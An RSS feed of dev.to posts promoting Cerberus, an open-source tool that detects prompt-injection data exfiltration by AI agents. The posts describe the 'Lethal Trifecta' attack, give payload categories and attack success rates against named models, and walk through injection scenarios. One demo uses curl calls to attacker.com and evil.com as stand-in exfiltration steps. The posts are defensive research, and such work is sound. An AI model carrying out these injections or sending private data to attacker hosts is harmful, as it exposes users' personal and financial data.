<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Dre</title>
    <description>The latest articles on DEV Community by Dre (@darklazaruswalks).</description>
    <link>https://dev.to/darklazaruswalks</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3802468%2Fb8a02292-4a0e-41ae-a1e1-a612928d1091.png</url>
      <title>DEV Community: Dre</title>
      <link>https://dev.to/darklazaruswalks</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/darklazaruswalks"/>
    <language>en</language>
    <item>
      <title>We Tested Agentic AI Against 525 Real Attacks. Here's What We Found.</title>
      <dc:creator>Dre</dc:creator>
      <pubDate>Fri, 13 Mar 2026 04:14:19 +0000</pubDate>
      <link>https://dev.to/darklazaruswalks/we-tested-agentic-ai-against-525-real-attacks-heres-what-we-found-13e2</link>
      <guid>https://dev.to/darklazaruswalks/we-tested-agentic-ai-against-525-real-attacks-heres-what-we-found-13e2</guid>
      <description>

&lt;p&gt;We ran the numbers. The threat is real.&lt;/p&gt;

&lt;p&gt;For the past several months, we've been building and validating Cerberus — an open-source runtime security harness for agentic AI systems. We designed it around a specific threat model we call the Lethal Trifecta: the simultaneous convergence, within a single AI execution turn, of privileged data access, untrusted content injection, and an outbound exfiltration path.&lt;/p&gt;

&lt;p&gt;We just finished our first formal validation run. N=525 attack trials across three major AI providers. Here is what the data shows.&lt;/p&gt;

&lt;p&gt;Attack Success Rates (full injection compliance — agent fully redirected to attacker's address):&lt;br&gt;
• GPT-4o-mini: 90.3% [95% CI: 84.8%–93.9%] — Causation Score: 0.811&lt;br&gt;
• Gemini 2.5 Flash: 82.4% [95% CI: 75.9%–87.5%] — Causation Score: 0.702&lt;br&gt;
• Claude Sonnet: 6.7% [95% CI: 3.8%–11.5%] — Causation Score: 0.207&lt;/p&gt;

&lt;p&gt;Control group: 0/30 exfiltrations across all providers (clean baseline). Fisher's exact test: OpenAI p&amp;lt;0.0001, Google p&amp;lt;0.0001 — both statistically significant.&lt;/p&gt;

&lt;p&gt;"This is not a theoretical vulnerability. At a 90% success rate, the Lethal Trifecta is a reliable attack primitive against current production AI systems."&lt;/p&gt;

&lt;h2&gt;What is the Lethal Trifecta — and why does it matter in supply chain and finance?&lt;/h2&gt;

&lt;p&gt;The attack chain requires three conditions to align within a single execution turn:&lt;/p&gt;

&lt;p&gt;• Privileged data access — the agent can see sensitive operational or financial data&lt;br&gt;
• Untrusted content injection — the agent is processing external input: a vendor document, an invoice, a client email, a compliance filing&lt;br&gt;
• An outbound exfiltration path — the agent has the authority to take downstream action&lt;/p&gt;
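&lt;p&gt;As a minimal sketch (the field names here are illustrative, not Cerberus internals), the per-turn precondition reduces to a three-way conjunction:&lt;/p&gt;

```typescript
// Sketch only: flag a turn in which all three Lethal Trifecta
// conditions are simultaneously active. Field names are invented.
interface TurnState {
  privilegedRead: boolean;   // agent saw sensitive operational or financial data
  untrustedInput: boolean;   // external content entered the context
  outboundAction: boolean;   // agent invoked a tool with outbound authority
}

function trifectaActive(turn: TurnState): boolean {
  // any two legs alone are routine; all three in one turn is the attack precondition
  return [turn.privilegedRead, turn.untrustedInput, turn.outboundAction].every(Boolean);
}
```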

&lt;p&gt;In supply chain environments, AI agents orchestrating procurement workflows read vendor submissions, cross-reference inventory systems, and trigger purchase orders. In financial services, agents summarize client portfolios, process compliance documents, and triage transactions. Both architectures deliver all three trifecta conditions by design.&lt;/p&gt;

&lt;p&gt;This is not a niche edge case. It is the default configuration of agentic AI in both industries — and our data shows that two of the three major model providers are vulnerable to it at rates above 80%.&lt;/p&gt;

&lt;h2&gt;What Cerberus detected — and where the gaps are&lt;/h2&gt;

&lt;p&gt;Cerberus operates in three detection layers. The validation ran in observe-only mode — agents behaved exactly as they normally would, and Cerberus recorded what it saw without intervening.&lt;/p&gt;

&lt;p&gt;Detection Layer Results (N=525):&lt;br&gt;
• L1 — Data Source Monitoring: 100% across all providers [97.9%, 100%]&lt;br&gt;
• L2 — Token Provenance Tracking: 100% across all providers [97.9%, 100%]&lt;br&gt;
• L3 — Outbound Intent Detection: 13.7% (OpenAI) / 1.1% (Anthropic) / 65.7% (Google)&lt;/p&gt;

&lt;p&gt;Overall detection rate: 28.5% [24.7%, 32.6%]. False positive rate: 0.0% [0.0%, 11.4%] — zero false triggers across 30 clean control runs.&lt;/p&gt;

&lt;p&gt;Per-Category Detection (all providers combined):&lt;br&gt;
• Direct Injection: 37.8% [28.5%, 48.1%]&lt;br&gt;
• Encoded/Obfuscated: 37.5% [27.2%, 49.0%]&lt;br&gt;
• Multi-turn: 33.3% [22.9%, 45.6%]&lt;br&gt;
• Multilingual: 33.3% [22.9%, 45.6%]&lt;br&gt;
• Advanced Technique: 20.0% [14.1%, 27.5%]&lt;br&gt;
• Social Engineering: 15.3% [8.8%, 25.3%]&lt;/p&gt;

&lt;p&gt;The L3 detection gap is a known limitation and the active development focus. L1 and L2 coverage is production-ready. L3 is where the adversarial arms race is happening.&lt;/p&gt;

&lt;h2&gt;Near-zero performance overhead&lt;/h2&gt;

&lt;p&gt;• p50: 52μs per session&lt;br&gt;
• p99: 0.23ms per session&lt;br&gt;
• Overhead: 0.01% of typical LLM latency (~2s)&lt;/p&gt;

&lt;p&gt;Against a typical LLM response time of ~2 seconds, Cerberus adds 0.01% overhead at p99. There is no meaningful performance argument against deploying it.&lt;/p&gt;
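&lt;p&gt;The arithmetic behind that figure, as a quick check against the numbers above:&lt;/p&gt;

```typescript
// p99 Cerberus latency vs. a typical ~2 s LLM response (figures from above).
const cerberusP99Ms = 0.23;   // 0.23 ms per session at p99
const llmResponseMs = 2000;   // ~2 s typical LLM latency

const overheadPercent = (cerberusP99Ms / llmResponseMs) * 100;
// = 0.0115%, i.e. on the order of 0.01%
```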

&lt;h2&gt;What this means if you're running AI in supply chain or financial services&lt;/h2&gt;

&lt;p&gt;If your agentic AI deployment uses GPT-4o-mini or Gemini and processes external documents — vendor submissions, invoices, client communications, compliance filings — the Lethal Trifecta succeeds against it at a rate above 80%.&lt;/p&gt;

&lt;p&gt;The question is not whether this attack is theoretically possible. The question is whether you have a runtime layer that can detect when all three trifecta conditions are active in a single execution turn. Most deployments today do not.&lt;/p&gt;

&lt;p&gt;Cerberus is open source. L1 and L2 detection are production-ready. L3 is under active development with full transparency on where the gaps are. That's the honest state of the tooling — and it's already more runtime visibility than any comparable open-source option provides today.&lt;/p&gt;




&lt;p&gt;🔗 github.com/Odingard/cerberus&lt;br&gt;
📦 npm: @cerberus-ai/core (signed provenance)&lt;br&gt;
🧪 demo.cerberus.sixsenseenterprise.com&lt;br&gt;
🌐 sixsenseenterprise.com&lt;/p&gt;

&lt;p&gt;#AISecurity #AgenticAI #SupplyChain #FinancialServices #CyberSecurity #RuntimeSecurity #PromptInjection #OpenSource #Cerberus #SixSense #LLMSecurity #RedTeam&lt;/p&gt;

</description>
      <category>ai</category>
      <category>security</category>
      <category>supply</category>
      <category>cerberus</category>
    </item>
    <item>
      <title>We Open-Sourced Cerberus — Runtime Security for Agentic AI</title>
      <dc:creator>Dre</dc:creator>
      <pubDate>Tue, 10 Mar 2026 03:39:08 +0000</pubDate>
      <link>https://dev.to/darklazaruswalks/we-open-sourced-cerberus-runtime-security-for-agentic-ai-5glk</link>
      <guid>https://dev.to/darklazaruswalks/we-open-sourced-cerberus-runtime-security-for-agentic-ai-5glk</guid>
      <description>&lt;p&gt;I’ve been following the [un]prompted conference agenda this week — one of the most practitioner-focused AI security events out there. Two things jumped out at me.&lt;br&gt;
Stripe has a talk called “Breaking the Lethal Trifecta.” Google’s talk describes the same problem as the “Perfect Storm” — sensitive data, untrusted content, external execution, all in the same execution turn.&lt;br&gt;
I’ve been building a tool that catches exactly this. Seeing it on the agenda confirmed we were working on the right problem. So today we’re open-sourcing Cerberus.&lt;br&gt;
What is the Lethal Trifecta?&lt;br&gt;
Three conditions that make agentic AI exploitable in a single execution turn:&lt;br&gt;
    1.  Privileged data access — the agent can read secrets, configs, or sensitive context&lt;br&gt;
    2.  Untrusted content injection — an adversarial payload reaches the model’s input&lt;br&gt;
    3.  Outbound exfiltration path — the agent can write to an external destination&lt;br&gt;
When all three are present simultaneously, a single injected sentence can exfiltrate secrets, poison memory for future sessions, or pivot across tool calls — no human in the loop.&lt;br&gt;
Existing tools check each leg in isolation. Nobody was correlating all three in real time. That’s the gap Cerberus closes.&lt;br&gt;
How Cerberus Works&lt;br&gt;
Cerberus wraps your LLM calls and monitors each execution turn as a complete unit — inputs, tool calls, outputs, and memory state — not individual signals.&lt;br&gt;
Four detection layers:&lt;br&gt;
    ∙ L1 — Pattern matching (fast, low false-positive rate)&lt;br&gt;
    ∙ L2 — Semantic analysis (catches obfuscated payloads)&lt;br&gt;
    ∙ L3 — Behavioral heuristics (unusual tool call sequences)&lt;br&gt;
    ∙ L4 — Correlation engine (are all three Trifecta legs present?)&lt;br&gt;
Plus a SQLite-backed memory contamination graph for cross-session taint tracking.&lt;br&gt;
The Numbers&lt;br&gt;
    ∙ 326 tests, 99.7% coverage&lt;br&gt;
    ∙ 21-payload attack harness across 5 attack categories&lt;br&gt;
    ∙ 100% attack detection validated before shipping any detection layer&lt;br&gt;
    ∙ Multi-model validation against Claude, GPT-4o, and Gemini in progress&lt;/p&gt;
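&lt;p&gt;To illustrate the cross-session taint idea behind the contamination graph (a simplified in-memory sketch; the real implementation is SQLite-backed, and the names here are invented):&lt;/p&gt;

```typescript
// Simplified taint propagation: a memory entry is tainted if it was
// written from untrusted content, or derived from an already-tainted entry.
const tainted = new Set();  // keys of contaminated memory entries

function writeMemory(key: string, fromUntrusted: boolean, derivedFrom: string[] = []): void {
  const inheritsTaint = derivedFrom.some((src) => tainted.has(src));
  if (fromUntrusted || inheritsTaint) {
    tainted.add(key);
  }
}

function isTainted(key: string): boolean {
  return tainted.has(key);
}
```

A payload absorbed in one session stays flagged when a later session reads anything derived from the contaminated entry.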

</description>
      <category>security</category>
      <category>ai</category>
      <category>llm</category>
      <category>opensource</category>
    </item>
    <item>
      <title>I built a live interactive attack demo — watch real prompt injection happen and get blocked in real time</title>
      <dc:creator>Dre</dc:creator>
      <pubDate>Thu, 05 Mar 2026 11:46:35 +0000</pubDate>
      <link>https://dev.to/darklazaruswalks/i-built-a-live-interactive-attack-demo-watch-real-prompt-injection-happen-and-get-blocked-in-real-47n1</link>
      <guid>https://dev.to/darklazaruswalks/i-built-a-live-interactive-attack-demo-watch-real-prompt-injection-happen-and-get-blocked-in-real-47n1</guid>
      <description>&lt;p&gt;If you've been following Cerberus, the open-source agentic AI security layer I've been building, here's something new: a live interactive demo running on a real server with real Grafana metrics.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;→ &lt;a href="http://demo.cerberus.sixsenseenterprise.com" rel="noopener noreferrer"&gt;demo.cerberus.sixsenseenterprise.com&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;What it does&lt;/h2&gt;

&lt;p&gt;Pick a scenario. Hit Run. Watch step cards populate as the attack executes. Watch the Grafana panel spike. Everything is real — real Cerberus &lt;code&gt;guard()&lt;/code&gt; middleware, real OpenTelemetry spans, real Prometheus scraping, real Grafana rendering.&lt;/p&gt;

&lt;h2&gt;The scenarios&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;Steps&lt;/th&gt;
&lt;th&gt;Expected outcome&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Clean Run (Control)&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Passes — score stays 1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data Exfiltration&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Logged — score 2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Prompt Injection&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Logged — score 2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Full Lethal Trifecta&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;BLOCKED&lt;/strong&gt; — score 4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Encoded Injection (Base64)&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;BLOCKED&lt;/strong&gt; — score 4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Social Engineering&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;BLOCKED&lt;/strong&gt; — score 4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Enterprise APT Simulation&lt;/td&gt;
&lt;td&gt;19&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;BLOCKED at step 19&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;The Enterprise APT scenario is the interesting one&lt;/h2&gt;

&lt;p&gt;19 steps. Twelve legitimate internal reads (HR, finance, CRM, payroll, contracts, audit logs, secrets vault). One clean external fetch (vendor portal). One injection delivery disguised as a "GDPR regulatory update" from &lt;code&gt;compliance-verify.net&lt;/code&gt;. Two authorized sends to &lt;code&gt;acme.com&lt;/code&gt; — &lt;strong&gt;these pass&lt;/strong&gt;. One attempted exfiltration to &lt;code&gt;data-audit@compliance-verify.net&lt;/code&gt; — &lt;strong&gt;blocked&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;authorizedDestinations&lt;/code&gt; config is key. Cerberus tracks what's authorized in context. Legitimate sends don't get blocked. Only the attacker's destination does.&lt;/p&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
const guarded = guard(executors, {
  threshold: 3,
  alertMode: 'interrupt',
  opentelemetry: true,
  authorizedDestinations: ['acme.com', 'deloitte.com'],
  // ...
}, outboundTools);
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

</description>
      <category>ai</category>
      <category>opensource</category>
      <category>security</category>
      <category>showdev</category>
    </item>
    <item>
      <title>Zero-Code-Change AI Security: Cerberus Now Runs as an HTTP Proxy</title>
      <dc:creator>Dre</dc:creator>
      <pubDate>Wed, 04 Mar 2026 21:44:28 +0000</pubDate>
      <link>https://dev.to/darklazaruswalks/zero-code-change-ai-security-cerberus-now-runs-as-an-http-proxy-4o4c</link>
      <guid>https://dev.to/darklazaruswalks/zero-code-change-ai-security-cerberus-now-runs-as-an-http-proxy-4o4c</guid>
      <description>&lt;p&gt;Most security tooling asks you to change your agent's code. Wrap this, extend that, swap your tool executor. If you're deep in a LangChain or OpenAI Agents setup that's already running in prod, that's friction.&lt;/p&gt;

&lt;p&gt;New in Cerberus: proxy/gateway mode. Same detection, zero changes to your agent.&lt;/p&gt;

&lt;h2&gt;How it works&lt;/h2&gt;

&lt;p&gt;Instead of wrapping your executors with guard(), you spin up a Cerberus proxy and route your agent's tool calls through it:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import { createProxy } from '@cerberus-ai/core';

const proxy = createProxy({
  port: 4000,
  cerberus: { alertMode: 'interrupt', threshold: 3 },
  tools: {
    readCustomerData: {
      target: 'http://localhost:3001/readCustomerData',
      trustLevel: 'trusted',
    },
    fetchWebpage: {
      target: 'http://localhost:3001/fetchWebpage',
      trustLevel: 'untrusted',
    },
    sendEmail: {
      target: 'http://localhost:3001/sendEmail',
      outbound: true,
    },
  },
});

await proxy.listen(); // port 4000
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Your agent calls &lt;code&gt;POST http://localhost:4000/tool/sendEmail&lt;/code&gt; with &lt;code&gt;{ "args": {...} }&lt;/code&gt; instead of calling the tool server directly. That's the only change.&lt;/p&gt;

&lt;h2&gt;What the proxy returns&lt;/h2&gt;

&lt;p&gt;Allowed call:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;200 { "result": "Email sent to user@company.com" }
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Lethal Trifecta detected (L1 + L2 + L3 fires):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;403 { "blocked": true, "message": "[Cerberus] Tool call blocked — risk score 3/4" }
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Plus an &lt;code&gt;X-Cerberus-Blocked: true&lt;/code&gt; header.&lt;/p&gt;

&lt;h2&gt;The thing that makes this work: session state&lt;/h2&gt;

&lt;p&gt;The Lethal Trifecta attack pattern isn't a single call — it's a sequence. Turn 1: agent reads private customer data (L1). Turn 2: agent fetches an attacker-controlled page that contains an injection (L2). Turn 3: agent sends an email to an external address with that data in the body (L3). Score hits 3/4. Blocked.&lt;/p&gt;

&lt;p&gt;In proxy mode, each agent run sends an &lt;code&gt;X-Cerberus-Session&lt;/code&gt; header. The proxy maintains independent detection state per session ID, so cumulative scoring works across multiple HTTP requests from the same run. The attack pattern is detected whether you're using &lt;code&gt;guard()&lt;/code&gt; inline or routing through the proxy.&lt;/p&gt;
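&lt;p&gt;A stripped-down sketch of that per-session accumulation (illustrative only, not the actual proxy code):&lt;/p&gt;

```typescript
// Each X-Cerberus-Session value keys its own set of fired detection layers;
// the risk score is how many distinct layers have fired so far in that run.
const sessions = new Map();  // session id -> set of fired layers

function recordSignal(sessionId: string, layer: string): number {
  const fired = sessions.get(sessionId) ?? new Set();
  fired.add(layer);
  sessions.set(sessionId, fired);
  return fired.size; // cumulative score for this session
}

const THRESHOLD = 3; // matches the threshold: 3 config above

function shouldBlock(sessionId: string): boolean {
  return (sessions.get(sessionId)?.size ?? 0) >= THRESHOLD;
}
```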

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;curl -X POST http://localhost:4000/tool/readCustomerData \
  -H "X-Cerberus-Session: run-abc123" \
  -H "Content-Type: application/json" \
  -d '{"args": {}}'
# 200 — score 1/4

curl -X POST http://localhost:4000/tool/fetchWebpage \
  -H "X-Cerberus-Session: run-abc123" \
  -d '{"args": {"url": "https://attacker.com/payload"}}'
# 200 — score 2/4

curl -X POST http://localhost:4000/tool/sendEmail \
  -H "X-Cerberus-Session: run-abc123" \
  -d '{"args": {"to": "audit@evil.com", "body": ""}}'
# 403 — score 3/4 — BLOCKED
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h2&gt;Under the hood&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Pure &lt;code&gt;node:http&lt;/code&gt; — zero new dependencies&lt;/li&gt;
&lt;li&gt;&lt;code&gt;GET /health&lt;/code&gt; → &lt;code&gt;{ "status": "ok", "sessions": N }&lt;/code&gt; for monitoring&lt;/li&gt;
&lt;li&gt;Sessions auto-expire after 30 minutes of inactivity&lt;/li&gt;
&lt;li&gt;Supports HTTP upstream targets or local handlers (useful for testing)&lt;/li&gt;
&lt;li&gt;733 tests, 98%+ coverage&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The proxy joins &lt;code&gt;guard()&lt;/code&gt; (inline wrapping) and the framework adapters (LangChain, Vercel AI, OpenAI Agents) as a third integration path. Pick the one that fits where you are.&lt;/p&gt;

&lt;p&gt;Repo: github.com/Odingard/cerberus&lt;br&gt;
npm: npm install @cerberus-ai/core&lt;/p&gt;

</description>
      <category>ai</category>
      <category>security</category>
      <category>opensource</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>I ran 765 controlled experiments to prove AI agents are leaking your data — and built the tool that catches it</title>
      <dc:creator>Dre</dc:creator>
      <pubDate>Wed, 04 Mar 2026 06:27:47 +0000</pubDate>
      <link>https://dev.to/darklazaruswalks/i-ran-765-controlled-experiments-to-prove-ai-agents-are-leaking-your-data-and-built-the-tool-that-1pl2</link>
      <guid>https://dev.to/darklazaruswalks/i-ran-765-controlled-experiments-to-prove-ai-agents-are-leaking-your-data-and-built-the-tool-that-1pl2</guid>
      <description>&lt;p&gt;Every AI agent that can read private data, fetch external content, and send &lt;br&gt;
outbound messages is one injected instruction away from exfiltrating everything &lt;br&gt;
it knows.&lt;/p&gt;

&lt;p&gt;This isn't theoretical. Here's the attack in three tool calls:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Turn 0:  readPrivateData()         → 5 customer records loaded (SSNs, emails, phones)
         fetchExternalContent(url) → attacker's webpage, payload embedded in HTML
Turn 1:  sendOutboundReport()      → all PII sent to attacker's address
Turn 2:  "Report sent successfully!"
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Total time: ~12 seconds. Cost: $0.001. No exploits. No credentials. Just a fetched webpage and a compliant model.&lt;/p&gt;

&lt;h2&gt;We measured it. Rigorously.&lt;/h2&gt;

&lt;p&gt;30 injection payloads across 6 categories — direct injection, encoded/obfuscated (Base64, ROT13, hex, Unicode), social engineering (CEO fraud, IT impersonation, legal threats), multi-turn (persistent rules, delayed triggers, context poisoning), multilingual (Spanish, Mandarin, Arabic, Russian), and advanced techniques.&lt;/p&gt;

&lt;p&gt;Tested against three major LLM providers. N=285 total runs with Wilson 95% confidence intervals:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Provider&lt;/th&gt;
&lt;th&gt;Attack Success&lt;/th&gt;
&lt;th&gt;95% CI&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;GPT-4o-mini&lt;/td&gt;
&lt;td&gt;93.3%&lt;/td&gt;
&lt;td&gt;[86.2%, 96.9%]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gemini 2.5 Flash&lt;/td&gt;
&lt;td&gt;92.2%&lt;/td&gt;
&lt;td&gt;[84.8%, 96.2%]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Claude Sonnet&lt;/td&gt;
&lt;td&gt;13.3%&lt;/td&gt;
&lt;td&gt;[7.8%, 21.9%]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
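&lt;p&gt;For reference, the Wilson intervals in the table can be recomputed directly. The per-provider trial counts aren't broken out above, but 84 successes in 90 trials reproduces the GPT-4o-mini row (93.3%, [86.2%, 96.9%]):&lt;/p&gt;

```typescript
// Wilson score interval for a binomial proportion (z = 1.96 for 95%).
function wilsonCI(successes: number, trials: number, z = 1.96): [number, number] {
  const p = successes / trials;
  const z2 = z * z;
  const denom = 1 + z2 / trials;
  const center = (p + z2 / (2 * trials)) / denom;
  const half =
    (z * Math.sqrt((p * (1 - p)) / trials + z2 / (4 * trials * trials))) / denom;
  return [center - half, center + half];
}

const [lo, hi] = wilsonCI(84, 90); // 84/90 = 93.3%
// lo ≈ 0.862, hi ≈ 0.969, i.e. the [86.2%, 96.9%] row above
```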

&lt;p&gt;Two of the three most widely deployed AI providers are fully exploitable today.&lt;/p&gt;

&lt;p&gt;Claude resists — but its 7.8% CI floor is not zero, and not acceptable for enterprise PII. Its resistance reflects training against known payload patterns, not elimination of the underlying architectural condition.&lt;/p&gt;

&lt;h2&gt;The architectural condition is what matters&lt;/h2&gt;

&lt;p&gt;I call it the &lt;strong&gt;Lethal Trifecta&lt;/strong&gt;. Any agent that can:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Access privileged data&lt;/li&gt;
&lt;li&gt;Process untrusted external content
&lt;/li&gt;
&lt;li&gt;Take outbound actions&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;...is exploitable. Not because of a bug. Because of what makes it useful.&lt;/p&gt;

&lt;h2&gt;We also built the defense. And proved it works.&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Cerberus&lt;/strong&gt; is a runtime security platform that wraps your tool executors — one function call — and detects this attack pattern in real time.&lt;/p&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
typescript
import { guard } from '@cerberus-ai/core';

const { executors: secured } = guard(
  { readDatabase, fetchUrl, sendEmail },
  {
    alertMode: 'interrupt',
    threshold: 3,
    trustOverrides: [
      { toolName: 'readDatabase', trustLevel: 'trusted' },
      { toolName: 'fetchUrl', trustLevel: 'untrusted' },
    ],
  },
  ['sendEmail'] // outbound tools Cerberus monitors
);

// Use secured.readDatabase(), secured.fetchUrl(), secured.sendEmail()
// Cerberus intercepts transparently. No framework changes required.

We ran the same 30-payload suite a second time with Cerberus in observe-only
mode (N=480 runs):

0.0% false positive rate [0.0%, 11.4%] — zero false alerts on 30 clean sessions
100% accuracy on L1 and L2 — every privileged data read and untrusted content fetch tagged, deterministically
L3 catches every confirmed exfiltration — fires when PII actually flows to an unauthorized destination, not before
No prior prompt injection study has paired attack measurement with defensive
validation in the same experimental framework. We didn't want to just claim
detection — we wanted to prove it with the same rigor we used to prove the attack.

What's inside
Four detection layers sharing one correlation engine:

L1 — Tags every tool call by data trust level at access time. Detects secrets (AWS keys, JWTs, API tokens) in tool results.
L2 — Labels context tokens by origin before the LLM call. Detects injection patterns, encoding/obfuscation, and MCP tool poisoning.
L3 — Catches PII flowing to unauthorized destinations. Classifies suspicious domains (disposable emails, webhook services, IP addresses).
L4 — Tracks taint propagation through persistent memory across sessions. The first deployable defense against the MINJA (NeurIPS 2025) memory contamination attack class.
A correlation engine builds a 4-bit risk vector per turn, scores it 0-4, and
interrupts tool calls that cross the threshold.

Get it

npm install @cerberus-ai/core
MIT licensed. 718 tests at 98%+ coverage. Works with LangChain, Vercel AI SDK,
and OpenAI Agents SDK out of the box.



&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/Odingard" rel="noopener noreferrer"&gt;
        Odingard
      &lt;/a&gt; / &lt;a href="https://github.com/Odingard/cerberus" rel="noopener noreferrer"&gt;
        cerberus
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      Agentic AI runtime security — detects and interrupts prompt injection, data exfiltration, and memory contamination attacks in real-time.
    &lt;/h3&gt;
  &lt;/div&gt;
  &lt;div class="ltag-github-body"&gt;
    
&lt;div id="readme" class="md"&gt;
&lt;div&gt;
&lt;a rel="noopener noreferrer" href="https://github.com/Odingard/cerberus/docs/cerberus-banner.svg"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2FOdingard%2Fcerberus%2Fdocs%2Fcerberus-banner.svg" alt="Cerberus — Agentic AI Runtime Security" width="100%"&gt;&lt;/a&gt;
&lt;div class="markdown-heading"&gt;
&lt;h1 class="heading-element"&gt;Cerberus&lt;/h1&gt;
&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Runtime Security For AI Agent Tool Execution&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/Odingard/cerberus/actions/workflows/ci.yml" rel="noopener noreferrer"&gt;&lt;img src="https://github.com/Odingard/cerberus/actions/workflows/ci.yml/badge.svg" alt="CI"&gt;&lt;/a&gt;
&lt;a href="https://github.com/Odingard/cerberus/actions/workflows/release.yml" rel="noopener noreferrer"&gt;&lt;img src="https://github.com/Odingard/cerberus/actions/workflows/release.yml/badge.svg" alt="Release"&gt;&lt;/a&gt;
&lt;a href="https://www.npmjs.com/package/@cerberus-ai/core" rel="nofollow noopener noreferrer"&gt;&lt;img src="https://camo.githubusercontent.com/77011288f45dc148805434a853dfda66f050ad07dba7b5c89a3f0bbf51729ef1/68747470733a2f2f696d672e736869656c64732e696f2f6e706d2f762f4063657262657275732d61692f636f72652e737667" alt="npm version"&gt;&lt;/a&gt;
&lt;a href="https://opensource.org/licenses/MIT" rel="nofollow noopener noreferrer"&gt;&lt;img src="https://camo.githubusercontent.com/fdf2982b9f5d7489dcf44570e714e3a15fce6253e0cc6b5aa61a075aac2ff71b/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f4c6963656e73652d4d49542d79656c6c6f772e737667" alt="License: MIT"&gt;&lt;/a&gt;
&lt;a href="https://www.npmjs.com/package/@cerberus-ai/core" rel="nofollow noopener noreferrer"&gt;&lt;img src="https://camo.githubusercontent.com/ce6c79e94ddef24ead6e856d73fca57536a9aa30b4ae0012b2de6809044b4fbf/68747470733a2f2f696d672e736869656c64732e696f2f6e706d2f646d2f4063657262657275732d61692f636f72652e737667" alt="npm downloads"&gt;&lt;/a&gt;
